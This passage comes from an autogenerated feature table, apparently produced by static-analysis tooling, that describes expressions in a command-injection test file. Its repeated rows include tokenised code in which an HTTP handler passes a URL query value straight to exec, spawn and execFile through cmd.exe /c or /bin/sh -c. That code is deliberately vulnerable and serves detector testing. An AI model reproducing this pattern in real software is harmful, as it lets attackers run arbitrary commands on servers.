push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:12 | cp.spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:12 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | exceptional return of cp.spaw ... cmd])) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | exceptional return of cp.spaw ... cmd])) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | exceptional return of cp.spaw ... cmd])) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | exceptional return of cp.spaw ... cmd])) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:5:56:59 | exceptional return of cp.spaw ... cmd])) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:8:56:12 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:8:56:12 | spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:8:56:12 | spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:8:56:12 | spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:8:56:12 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:14:56:22 | 'cmd.exe' | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:37 | ['/C', 'foo'] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:37 | ['/C', 'foo'] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:37 | ['/C', 'foo'] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:37 | ['/C', 'foo'] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:37 | ['/C', 'foo'] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:44 | ['/C', 'foo'].concat | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:44 | ['/C', 'foo'].concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:44 | ['/C', 'foo'].concat | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:44 | ['/C', 'foo'].concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:44 | ['/C', 'foo'].concat | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | exceptional return of ['/C', ... , cmd]) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | exceptional return of ['/C', ... , cmd]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | exceptional return of ['/C', ... , cmd]) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | exceptional return of ['/C', ... , cmd]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:25:56:58 | exceptional return of ['/C', ... , cmd]) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:26:56:29 | '/C' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:32:56:36 | 'foo' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:39:56:44 | concat | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:39:56:44 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:39:56:44 | concat | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:39:56:44 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:39:56:44 | concat | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:46:56:57 | ["bar", cmd] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:47:56:51 | "bar" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin 